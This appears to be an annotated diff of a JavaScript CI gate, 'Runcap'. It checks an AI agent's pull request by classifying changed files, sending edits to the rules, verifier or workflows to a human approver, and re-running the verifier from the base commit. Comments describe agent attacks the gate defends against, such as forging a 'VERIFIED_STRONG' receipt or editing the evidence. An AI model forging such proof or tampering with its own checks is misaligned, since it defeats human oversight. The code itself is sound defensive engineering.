  while (i < parts.length) {
    const meta = parts[i];
    if (!meta || meta[0] !== ":") { i++; continue; }
    // ":<oldmode> <newmode> <oldsha> <newsha> <status>"
    const fields = meta.slice(1).split(/\s+/);
    const oldMode = fields[0];
    const newMode = fields[1];
    const statusField = fields[4] ?? "";
    const statusChar = statusField[0] ?? "";
    i++;
    if (statusChar === "R" || statusChar === "C") {
      const srcPath = parts[i]; const dstPath = parts[i + 1];
      i += 2;
      entries.push({ statusChar, statusField, oldMode, newMode, srcPath, path: dstPath });
    } else {
      const p = parts[i];
      i += 1;
      entries.push({ statusChar, statusField, oldMode, newMode, path: p });
    }
  }
  return entries;
}
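
To make the record layout concrete, here is a small sketch that feeds a hand-written `--raw -z` buffer through a compact copy of the parser. The object ids and file names are invented for the example, and `parseRawDiffSketch` is a condensed restatement for illustration, not a replacement for the function above.

```javascript
// Condensed restatement of parseRawDiff() so the example is self-contained.
function parseRawDiffSketch(buffer) {
  const parts = buffer.toString("utf8").split("\0");
  const entries = [];
  for (let i = 0; i < parts.length;) {
    const meta = parts[i++];
    if (!meta || meta[0] !== ":") continue; // skip empty tail / stray fields
    const [oldMode, newMode, , , statusField = ""] = meta.slice(1).split(/\s+/);
    const statusChar = statusField[0] ?? "";
    if (statusChar === "R" || statusChar === "C") {
      // Rename/copy: two path fields follow the metadata field.
      entries.push({ statusChar, oldMode, newMode, srcPath: parts[i], path: parts[i + 1] });
      i += 2;
    } else {
      entries.push({ statusChar, oldMode, newMode, path: parts[i] });
      i += 1;
    }
  }
  return entries;
}

// One modification and one rename, NUL-delimited as `git diff --raw -z` emits them.
const raw = Buffer.from(
  ":100644 100644 abc1234 def5678 M\0app/broken.mjs\0" +
  ":100644 100644 1111111 1111111 R100\0old.txt\0new.txt\0"
);

console.log(parseRawDiffSketch(raw));
```

The rename record consumes two path fields, which is why the parser has to branch on the status letter before advancing its index.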

function looksBinary(buffer) {
  // A NUL byte in the first 8KB is git's own "binary" heuristic.
  const slice = buffer.subarray(0, 8192);
  return slice.includes(0);
}

function isValidUtf8(buffer) {
  try {
    new TextDecoder("utf-8", { fatal: true }).decode(buffer);
    return true;
  } catch {
    return false;
  }
}
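
The two content checks are complementary: the NUL-byte test catches typical binaries, while the strict decode catches byte sequences that contain no NUL but are still not UTF-8. A short sketch with made-up byte samples, using copies of the two helpers so it runs standalone:

```javascript
// Copies of the two helpers above, renamed to mark them as illustrative.
function looksBinarySketch(buffer) {
  return buffer.subarray(0, 8192).includes(0);
}
function isValidUtf8Sketch(buffer) {
  try {
    // fatal: true makes decode() throw instead of emitting U+FFFD.
    new TextDecoder("utf-8", { fatal: true }).decode(buffer);
    return true;
  } catch {
    return false;
  }
}

const text = Buffer.from("export const ok = true;\n", "utf8");
const withNul = Buffer.from([0x50, 0x4b, 0x00, 0x03]); // contains a NUL byte
const latin1 = Buffer.from([0x63, 0x61, 0x66, 0xe9]);  // "cafe" with a Latin-1 e-acute: no NUL, invalid UTF-8

for (const [name, buf] of [["text", text], ["withNul", withNul], ["latin1", latin1]]) {
  console.log(name, { binary: looksBinarySketch(buf), utf8: isValidUtf8Sketch(buf) });
}
```

Only the first sample passes both checks; the Latin-1 sample shows why `classifyEntry` runs the UTF-8 check in addition to the NUL heuristic.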
|
|
244
|
+
|
|
245
|
+
// Classify one diff entry into candidate | blocked | human, with a reason.
|
|
246
|
+
// Structural rejects come first (never auto-approvable), then sensitive paths
|
|
247
|
+
// (human gate), then scope (block), then the in-scope regular edit (candidate).
|
|
248
|
+
async function classifyEntry(entry, { headSha, cwd, protectedPaths, allowed, verifierPaths }) {
|
|
249
|
+
const p = entry.path;
|
|
250
|
+
const s = entry.statusChar;
|
|
251
|
+
|
|
252
|
+
if (s === "D") return { path: p, class: "blocked", detail: "file deleted (deletions are never auto-approved)" };
|
|
253
|
+
if (s === "R") return { path: p, class: "blocked", detail: `file renamed from ${entry.srcPath} (renames are never auto-approved)` };
|
|
254
|
+
if (s === "C") return { path: p, class: "blocked", detail: `file copied from ${entry.srcPath} (copies are never auto-approved)` };
|
|
255
|
+
if (s === "T") return { path: p, class: "blocked", detail: "file type changed (type changes are never auto-approved)" };
|
|
256
|
+
if (entry.newMode === "120000") return { path: p, class: "blocked", detail: "symlink (symlinks are never auto-approved)" };
+  if (entry.newMode === "160000") return { path: p, class: "blocked", detail: "submodule/gitlink (submodules are never auto-approved)" };
+  if (s === "M" && entry.oldMode !== entry.newMode) return { path: p, class: "blocked", detail: `mode change ${entry.oldMode} -> ${entry.newMode} (mode changes are never auto-approved)` };
+  if (entry.newMode !== "100644") return { path: p, class: "blocked", detail: `non-regular file mode ${entry.newMode} (only plain 100644 text files can be auto-applied)` };
+  if (s !== "A" && s !== "M") return { path: p, class: "blocked", detail: `unsupported diff status ${entry.statusField}` };
+
+  // Content checks on the HEAD blob (the bytes we would apply).
+  const got = await gitShowBytes(headSha, p, cwd);
+  if (!got.ok) return { path: p, class: "blocked", detail: `could not read head blob: ${got.error}` };
+  if (looksBinary(got.buffer)) return { path: p, class: "blocked", detail: "binary content (only UTF-8 text files can be auto-applied)" };
+  if (!isValidUtf8(got.buffer)) return { path: p, class: "blocked", detail: "not valid UTF-8 (only UTF-8 text files can be auto-applied)" };
+  const head = got.buffer.toString("utf8");
+  if (head.startsWith(LFS_POINTER_SIGNATURE)) return { path: p, class: "blocked", detail: "Git LFS pointer (real content is not in the tree, cannot replay)" };
+
+  // Sensitive-path human gate: the rules or the evidence themselves.
+  if (isPolicyPath(p)) return { path: p, class: "human", detail: "edits the mission policy (the rules) - human CODEOWNER must approve" };
+  if (isWorkflowPath(p)) return { path: p, class: "human", detail: "edits a GitHub workflow - human CODEOWNER must approve" };
+  if (verifierPaths.includes(p)) return { path: p, class: "human", detail: "edits a verifier file (the evidence) - human CODEOWNER must approve" };
+  if (isDependencyPath(p)) return { path: p, class: "human", detail: "edits a dependency manifest/lockfile - human CODEOWNER must approve" };
+  if (isProtectedPath(p, protectedPaths)) return { path: p, class: "human", detail: "edits a protected/test/config path - human CODEOWNER must approve" };
+
+  // In-scope regular text edit. Out-of-scope edits are blocked.
+  if (!withinAllowed(p, allowed)) return { path: p, class: "blocked", detail: "outside the policy's allowed scope" };
+
+  return { path: p, class: "candidate", detail: s === "A" ? "added in-scope text file" : "modified in-scope text file", blob: got.buffer };
+}
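The mode checks in this classifier can be read in isolation. The sketch below is a simplified stand-in, not the package's `classifyEntry`: `modeVerdict` is a hypothetical helper that takes only the raw-diff status letter and the two Git file modes, and returns a short blocking reason or `null` when the entry may continue to the content checks. The mode values are Git's standard tree-entry modes (`120000` symlink, `160000` gitlink, `100644` regular non-executable file).

```javascript
// Hypothetical helper: mirrors only the order of the mode/status checks above.
function modeVerdict({ status, oldMode, newMode }) {
  if (newMode === "120000") return "symlink";
  if (newMode === "160000") return "submodule/gitlink";
  if (status === "M" && oldMode !== newMode) return `mode change ${oldMode} -> ${newMode}`;
  if (newMode !== "100644") return `non-regular file mode ${newMode}`;
  if (status !== "A" && status !== "M") return `unsupported diff status ${status}`;
  return null; // plain 100644 add or modify: continue to the content checks
}

// An executable-bit flip on an otherwise ordinary file is rejected.
console.log(modeVerdict({ status: "M", oldMode: "100644", newMode: "100755" }));
// A newly added regular file passes the mode checks.
console.log(modeVerdict({ status: "A", oldMode: "000000", newMode: "100644" }));
```

Because the symlink and gitlink checks come first, those entries get their specific reason rather than the generic "non-regular file mode" one.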
+
+// The concrete file paths a verify command names, resolved at the BASE commit so
+// a head-side rename of the verifier cannot hide it from the human gate.
+async function verifierFilesAtBase(verify, baseSha, cwd) {
+  const tokens = String(verify).split(/\s+/).filter(Boolean);
+  const files = [];
+  for (const raw of tokens) {
+    const tok = raw.replace(/^["']|["']$/g, "");
+    if (!/[./]/.test(tok)) continue;
+    const rel = tok.replace(/^\.\//, "");
+    if (await blobExists(baseSha, rel, cwd)) {
+      if (!files.includes(rel)) files.push(rel);
+    }
+  }
+  return files;
+}
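To see which parts of a verify command are even considered as verifier files, the tokenising step can be tried without a repository. This is a minimal sketch: `pathLikeTokens` is a hypothetical name, and it omits the `blobExists` lookup at the base commit that the function above uses to discard tokens that are not real files.

```javascript
// Same tokenising rules as verifierFilesAtBase, minus the Git lookup.
function pathLikeTokens(verify) {
  const out = [];
  for (const raw of String(verify).split(/\s+/).filter(Boolean)) {
    const tok = raw.replace(/^["']|["']$/g, ""); // strip one leading/trailing quote
    if (!/[./]/.test(tok)) continue;             // needs a dot or slash to look like a path
    const rel = tok.replace(/^\.\//, "");        // "./test/a.mjs" -> "test/a.mjs"
    if (!out.includes(rel)) out.push(rel);       // de-duplicate
  }
  return out;
}

console.log(pathLikeTokens('node --test "./test/app.test.mjs" test/app.test.mjs'));
console.log(pathLikeTokens("npm test"));
```

Since the command is split on whitespace, a quoted path that contains spaces would be broken into several tokens and would probably not resolve to a blob. Likewise, a command such as `npm test` names no file at all, so in that case the human gate has to rely on the protected-path and dependency-manifest checks instead.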
+
+// --- the replay -------------------------------------------------------------
+
+// Baseline + replay in a throwaway worktree pinned at the base commit. Deps come
+// from the base lockfile (npm ci --ignore-scripts: no lifecycle scripts, no
+// floating install). Then the permitted candidate blobs are written in and the
+// base-pinned verifier runs again. Truth comes only from this replay.
+async function replay({ baseSha, candidates, verify, cwd }) {
+  const tmpBase = await mkdtempWorktreeBase();
+  const wt = path.join(tmpBase, `wt-${createHash("sha1").update(`${baseSha}${Date.now()}${Math.random()}`).digest("hex").slice(0, 8)}`);
+  const add = await git(["worktree", "add", "--detach", wt, baseSha], cwd);
+  if (add.error) {
+    return { baselineFailed: null, replayPassed: null, dependencyInstall: "skipped_no_manifest", detail: `worktree add failed: ${add.error}`, ran: false };
+  }
+  try {
+    // Base-pinned dependency install (only when the base has a lockfile).
+    let dependencyInstall = "skipped_no_manifest";
+    const hasPkg = existsSync(path.join(wt, "package.json"));
+    const hasLock = existsSync(path.join(wt, "package-lock.json")) || existsSync(path.join(wt, "npm-shrinkwrap.json"));
+    if (hasPkg && hasLock) {
+      const ci = await runShell("npm ci --ignore-scripts --no-audit --no-fund", wt);
+      dependencyInstall = ci.exitCode === 0 ? "npm_ci_ignore_scripts" : "failed";
+      if (ci.exitCode !== 0) {
+        return { baselineFailed: null, replayPassed: null, dependencyInstall, detail: "npm ci (base-pinned, --ignore-scripts) failed", ran: true };
+      }
+    }
+
+    // 1. Baseline: the task must genuinely fail at base, or a later pass is meaningless.
+    const baseline = await runShell(verify, wt);
+    const baselineFailed = baseline.exitCode !== 0;
+
+    // 2. Apply only the permitted candidate blobs from head.
+    for (const c of candidates) {
+      const dst = path.join(wt, c.path);
+      await mkdir(path.dirname(dst), { recursive: true });
+      await writeFile(dst, c.blob);
+    }
+
+    // 3. Replay the base-pinned verifier with the change applied.
+    const after = await runShell(verify, wt);
+    const replayPassed = after.exitCode === 0;
+
+    return { baselineFailed, replayPassed, dependencyInstall, ran: true, detail: "baseline + replay completed in a clean base checkout" };
+  } finally {
+    await git(["worktree", "remove", "--force", wt], cwd);
+    await rm(tmpBase, { recursive: true, force: true }).catch(() => {});
+  }
+}
+
+async function mkdtempWorktreeBase() {
+  const base = path.join(os.tmpdir(), `runcap-adj-${process.pid}-${Date.now()}`);
+  await mkdir(base, { recursive: true });
+  return base;
+}
+
+// --- agent telemetry: deliberately NOT read by the required gate ------------
+
+// The agent's receipt is agent-controlled input. A forged "VERIFIED_STRONG"
+// receipt is exactly the Tier 2 attack this gate exists to defeat, so the
+// required job must never parse it: not to grade the verdict (it never did),
+// and not even to display it, because reading attacker-controlled JSON in the
+// mandatory check is needless attack surface (a malformed or enormous receipt
+// could crash or stall the only gate guarding the merge). The verdict therefore
+// reports a constant, telling a reviewer plainly that no receipt was consulted.
+// A later, NON-required report layer may surface advisory telemetry; the gate
+// that decides the merge does not.
+const GATE_AGENT_TELEMETRY = Object.freeze({
+  present: false,
+  influence_on_verdict: "none",
+  truth: "agent_receipt_not_read_by_required_gate"
+});
+
+// --- the adjudicator --------------------------------------------------------
+
+export async function adjudicate({ cwd = process.cwd(), baseFlag, headFlag, policyPath } = {}) {
+  const hardening = { required_profile: "documented", runtime_attestation: "not_performed_in_pr_job" };
+  const agentTelemetry = GATE_AGENT_TELEMETRY;
+
+  const base = (verdict, reasons, extra = {}) => ({
+    schema: "runcap.ci-verdict/v1",
+    verdict,
+    reasons,
+    repository_hardening: hardening,
+    agent_telemetry: agentTelemetry,
+    truth: "recomputed_by_adjudicator_from_base_sha",
+    ...extra
+  });
+
+  // 1. Resolve base/head from the trusted PR event only.
+  const { baseSha, headSha, shaSource } = resolveShas({ baseFlag, headFlag });
+  if (!baseSha || !headSha) {
+    return base("BLOCKED", ["Could not resolve base/head from the trusted pull_request event (and no explicit --base/--head). Refusing to adjudicate."], { sha_source: shaSource });
+  }
+  if (shaSource.startsWith("untrusted_event")) {
+    return base("BLOCKED", [`Refusing to adjudicate an untrusted event (${shaSource}). Only the read-only pull_request event is adjudicated.`], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource });
+  }
+  if (!(await revExists(baseSha, cwd)) || !(await revExists(headSha, cwd))) {
+    return base("BLOCKED", ["base or head commit is not present in the checkout (fetch depth too shallow?). Refusing to adjudicate."], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource });
+  }
+
+  // 2. Policy from the BASE commit (the approved rules), then validate it.
+  const loaded = await loadPolicyFromBase(baseSha, policyPath, cwd);
+  if (loaded.error) {
+    return base("BLOCKED", [loaded.error], { base_sha: baseSha, head_sha: headSha, sha_source: shaSource });
+  }
+  const policyResult = loaded.result;
+  const { ok, errors } = validatePolicy(policyResult.policy);
+  if (!ok) {
+    return base("BLOCKED", errors.map((e) => `base policy invalid: ${e}`), { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyMeta(policyResult) });
+  }
+  const verification = policyResult.policy.verification ?? {};
+  const verify = verification.command;
+  const protectedPaths = Array.isArray(verification.protect) ? verification.protect : [];
+  const allowed = Array.isArray(verification.allow) ? verification.allow : [];
+  const verifierPaths = await verifierFilesAtBase(verify, baseSha, cwd);
+
+  // 3. Compute the base..head diff ourselves and classify every entry.
+  const rawDiff = await new Promise((resolve) => {
+    const child = spawn("git", ["diff", "--raw", "-z", "--find-renames", baseSha, headSha], { cwd, shell: false });
+    const chunks = [];
+    child.stdout.on("data", (c) => chunks.push(c));
+    child.on("error", () => resolve(Buffer.alloc(0)));
+    child.on("close", () => resolve(Buffer.concat(chunks)));
+  });
+  const entries = parseRawDiff(rawDiff);
+  const classified = [];
+  for (const entry of entries) {
+    classified.push(await classifyEntry(entry, { headSha, cwd, protectedPaths, allowed, verifierPaths }));
+  }
+  const publicClassification = classified.map(({ blob, ...rest }) => rest);
+
+  const blocked = classified.filter((c) => c.class === "blocked");
+  const human = classified.filter((c) => c.class === "human");
+  const candidates = classified.filter((c) => c.class === "candidate");
+
+  const policyBlock = policyMeta(policyResult);
+
+  // 4. Verdict precedence: any structural/scope reject blocks; else a sensitive
+  // path sends it to a human; else we must reproduce the proof ourselves.
+  if (blocked.length) {
+    return base("BLOCKED", blocked.map((b) => `${b.path}: ${b.detail}`), {
+      base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock,
+      diff_classification: publicClassification
+    });
+  }
+  if (human.length) {
+    return base("HUMAN_APPROVAL_REQUIRED",
+      ["Runcap declined to issue an automated proof: the change touches the rules or the evidence themselves. A human CODEOWNER must approve.", ...human.map((h) => `${h.path}: ${h.detail}`)],
+      { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification });
+  }
+  if (candidates.length === 0) {
+    return base("BLOCKED", ["No applicable code change to adjudicate (empty or non-content diff)."], {
+      base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification
+    });
+  }
+
+  // 5. Replay from the base commit with only the candidate blobs applied.
+  const r = await replay({ baseSha, candidates, verify, cwd });
+  const codeEvidence = {
+    truth: "recomputed_by_adjudicator_from_base_sha",
+    baseline_failed: r.baselineFailed,
+    replay_passed: r.replayPassed,
+    dependency_install: r.dependencyInstall,
+    candidate_files: candidates.map((c) => c.path),
+    detail: r.detail
+  };
+
+  const reasons = [];
+  if (r.dependencyInstall === "failed") reasons.push("Base-pinned `npm ci --ignore-scripts` failed: cannot establish a clean baseline.");
+  if (r.baselineFailed === false) reasons.push("Baseline already green: the verifier passed at the base commit, so a post-change pass proves nothing.");
+  if (r.replayPassed !== true) reasons.push("Replay did not pass: the change did not make the base-pinned verifier pass in a clean base checkout.");
+
+  if (reasons.length) {
+    return base("BLOCKED", reasons, { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification, code_evidence: codeEvidence });
+  }
+
+  return base("PASS",
+    [`Verifier failed at base and passed after applying ${candidates.length} in-scope text change(s), recomputed in a clean base checkout.`],
+    { base_sha: baseSha, head_sha: headSha, sha_source: shaSource, policy: policyBlock, diff_classification: publicClassification, code_evidence: codeEvidence });
+}
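The verdict precedence in steps 4 and 5 of `adjudicate` can be condensed into a pure function, which makes the ordering easy to check by hand. This is an illustrative reduction only: `decideVerdict` and its input shape (counts plus a replay result) are assumptions made for this sketch, and the SHA resolution and policy validation that can block earlier are left out.

```javascript
// Hypothetical reduction of the adjudicator's decision order to a pure function.
function decideVerdict({ blocked, human, candidates, replay }) {
  if (blocked > 0) return "BLOCKED";                // structural or scope reject wins
  if (human > 0) return "HUMAN_APPROVAL_REQUIRED";  // then the sensitive-path gate
  if (candidates === 0) return "BLOCKED";           // nothing left to replay
  const ok =
    replay.dependencyInstall !== "failed" && // the base-pinned install must not fail
    replay.baselineFailed !== false &&       // verifier must not already be green at base
    replay.replayPassed === true;            // and must pass with the change applied
  return ok ? "PASS" : "BLOCKED";
}

const goodReplay = { dependencyInstall: "npm_ci_ignore_scripts", baselineFailed: true, replayPassed: true };
console.log(decideVerdict({ blocked: 0, human: 0, candidates: 2, replay: goodReplay }));
console.log(decideVerdict({ blocked: 1, human: 1, candidates: 2, replay: goodReplay }));
console.log(decideVerdict({ blocked: 0, human: 0, candidates: 2, replay: { ...goodReplay, baselineFailed: false } }));
```

A single blocked entry outranks any number of human-gated ones, so a pull request that both changes a file mode and edits a workflow is reported as `BLOCKED`, not handed to a CODEOWNER.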
+
+// Markdown lines for the PR step summary + terminal print.
+export function formatAdjudication(v) {
+  const lines = [
+    `Runcap CI adjudication (independent replay from base)`,
+    `====================================================`,
+    `Verdict: ${v.verdict}`,
+    `Base SHA: ${v.base_sha ?? "unresolved"} (source: ${v.sha_source ?? "unknown"})`,
+    `Head SHA: ${v.head_sha ?? "unresolved"}`
+  ];
+  if (v.policy) {
+    lines.push(`Policy: ${v.policy.mission?.name ?? "(unnamed)"} - hash ${v.policy.hash}`);
+  }
+  if (v.code_evidence) {
+    const ce = v.code_evidence;
+    lines.push(`Replay: baseline_failed=${ce.baseline_failed} replay_passed=${ce.replay_passed} deps=${ce.dependency_install}`);
+  }
+  lines.push(`Hardening: required_profile=${v.repository_hardening.required_profile}, runtime_attestation=${v.repository_hardening.runtime_attestation}`);
+  lines.push(`Agent receipt: not read by this required gate (verdict is recomputed from the base commit).`);
+  if (Array.isArray(v.reasons) && v.reasons.length) {
+    lines.push(v.verdict === "PASS" ? `Why:` : `Why ${v.verdict}:`);
+    for (const r of v.reasons) lines.push(` - ${r}`);
+  }
+  return lines;
+}
+
+// Exit code: PASS and HUMAN_APPROVAL_REQUIRED are non-failing (the human gate is
+// a success/neutral outcome that hands authority to a CODEOWNER); BLOCKED fails.
+export function exitCodeFor(verdict) {
+  return verdict === "BLOCKED" ? 1 : 0;
+}
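One property of this mapping is worth noting: every value other than the exact string `"BLOCKED"` exits 0. That is safe while the input is always one of the three verdicts `adjudicate` returns. The sketch below copies the released function and contrasts it with a stricter variant; `exitCodeForStrict` is hypothetical and not part of the package.

```javascript
// As released: anything that is not exactly "BLOCKED" exits 0.
function exitCodeFor(verdict) {
  return verdict === "BLOCKED" ? 1 : 0;
}

// Hypothetical stricter variant (not in the package): only known non-failing
// verdicts exit 0, so a typo or a missing verdict fails the job.
const NON_FAILING = new Set(["PASS", "HUMAN_APPROVAL_REQUIRED"]);
function exitCodeForStrict(verdict) {
  return NON_FAILING.has(verdict) ? 0 : 1;
}

for (const v of ["PASS", "HUMAN_APPROVAL_REQUIRED", "BLOCKED", undefined]) {
  console.log(String(v), exitCodeFor(v), exitCodeForStrict(v));
}
```

The two functions agree on all three real verdicts and differ only on unexpected input, which matters if a caller ever passes a verdict from another source.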
|